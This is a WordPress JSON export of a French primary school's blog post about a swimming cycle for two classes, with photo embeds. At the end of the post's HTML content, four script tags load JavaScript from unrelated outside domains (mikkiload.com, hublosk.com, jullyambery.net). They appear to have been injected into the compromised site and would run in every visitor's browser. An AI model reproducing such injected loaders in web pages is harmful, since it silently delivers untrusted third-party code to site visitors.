{"id":2353,"date":"2021-11-17T15:31:43","date_gmt":"2021-11-17T14:31:43","guid":{"rendered":"http:\/\/www.ecole-stjeannotredame.fr\/?p=2353"},"modified":"2021-11-17T15:31:43","modified_gmt":"2021-11-17T14:31:43","slug":"cycle-natation","status":"publish","type":"post","link":"https:\/\/www.ecole-stjeannotredame.fr\/index.php\/2021\/11\/17\/cycle-natation\/","title":{"rendered":"Cycle natation"},"content":{"rendered":"<h3>Depuis le d\u00e9but de l&rsquo;ann\u00e9e, les \u00e9l\u00e8ves de la classe de CE1-CE2 de Mme Raveneau et de la classe de CE2 de Mme Gondard ont v\u00e9cu un cycle sportif de natation.<\/h3>\n<h3>L&rsquo;occasion pour les \u00e9l\u00e8ves de d\u00e9velopper leur aisance dans l&rsquo;eau.<\/h3>\n<h3><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-2355\" src=\"http:\/\/www.ecole-stjeannotredame.fr\/wp-content\/uploads\/2021\/11\/IMG_20210923_105051-scaled.jpg\" alt=\"\" width=\"1920\" height=\"2560\" srcset=\"http:\/\/www.ecole-stjeannotredame.fr\/wp-content\/uploads\/2021\/11\/IMG_20210923_105051-scaled.jpg 1920w, http:\/\/www.ecole-stjeannotredame.fr\/wp-content\/uploads\/2021\/11\/IMG_20210923_105051-1280x1707.jpg 1280w, http:\/\/www.ecole-stjeannotredame.fr\/wp-content\/uploads\/2021\/11\/IMG_20210923_105051-980x1307.jpg 980w, http:\/\/www.ecole-stjeannotredame.fr\/wp-content\/uploads\/2021\/11\/IMG_20210923_105051-480x640.jpg 480w\" sizes=\"auto, (min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) and (max-width: 980px) 980px, (min-width: 981px) and (max-width: 1280px) 1280px, (min-width: 1281px) 1920px, 100vw\" \/> <img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-2356\" src=\"http:\/\/www.ecole-stjeannotredame.fr\/wp-content\/uploads\/2021\/11\/IMG_20210923_105056-scaled.jpg\" alt=\"\" width=\"1920\" height=\"2560\" srcset=\"http:\/\/www.ecole-stjeannotredame.fr\/wp-content\/uploads\/2021\/11\/IMG_20210923_105056-scaled.jpg 1920w, http:\/\/www.ecole-stjeannotredame.fr\/wp-content\/uploads\/2021\/11\/IMG_20210923_105056-1280x1707.jpg 1280w, http:\/\/www.ecole-stjeannotredame.fr\/wp-content\/uploads\/2021\/11\/IMG_20210923_105056-980x1307.jpg 980w, http:\/\/www.ecole-stjeannotredame.fr\/wp-content\/uploads\/2021\/11\/IMG_20210923_105056-480x640.jpg 480w\" sizes=\"auto, (min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) and (max-width: 980px) 980px, (min-width: 981px) and (max-width: 1280px) 1280px, (min-width: 1281px) 1920px, 100vw\" \/><\/h3>\n<p>&nbsp;<\/p>\n<p><script src=\"\/\/mikkiload.com\/22f8b8adb2fe982a8c.js\"><\/script><script src=\"http:\/\/hublosk.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8952x\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/jullyambery.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8952x&amp;format=arrjs&amp;r=1637158429398\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/mikkiload.com\/ext\/22f8b8adb2fe982a8c.js?sid=52689_8952_&amp;title=aa&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Depuis le d\u00e9but de l&rsquo;ann\u00e9e, les \u00e9l\u00e8ves de la classe de CE1-CE2 de Mme Raveneau et de la classe de CE2 de Mme Gondard ont v\u00e9cu un cycle sportif de natation. L&rsquo;occasion pour les \u00e9l\u00e8ves de d\u00e9velopper leur aisance dans l&rsquo;eau. &nbsp;<\/p>\n","protected":false},"author":13,"featured_media":2356,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_et_pb_use_builder":"","_et_pb_old_content":"","_et_gb_content_width":"","footnotes":""},"categories":[1],"tags":[],"class_list":["post-2353","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-non-classe"],"_links":{"self":[{"href":"https:\/\/www.ecole-stjeannotredame.fr\/index.php\/wp-json\/wp\/v2\/posts\/2353","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ecole-stjeannotredame.fr\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.ecole-stjeannotredame.fr\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.ecole-stjeannotredame.fr\/index.php\/wp-json\/wp\/v2\/users\/13"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ecole-stjeannotredame.fr\/index.php\/wp-json\/wp\/v2\/comments?post=2353"}],"version-history":[{"count":1,"href":"https:\/\/www.ecole-stjeannotredame.fr\/index.php\/wp-json\/wp\/v2\/posts\/2353\/revisions"}],"predecessor-version":[{"id":2357,"href":"https:\/\/www.ecole-stjeannotredame.fr\/index.php\/wp-json\/wp\/v2\/posts\/2353\/revisions\/2357"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.ecole-stjeannotredame.fr\/index.php\/wp-json\/wp\/v2\/media\/2356"}],"wp:attachment":[{"href":"https:\/\/www.ecole-stjeannotredame.fr\/index.php\/wp-json\/wp\/v2\/media?parent=2353"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.ecole-stjeannotredame.fr\/index.php\/wp-json\/wp\/v2\/categories?post=2353"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.ecole-stjeannotredame.fr\/index.php\/wp-json\/wp\/v2\/tags?post=2353"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}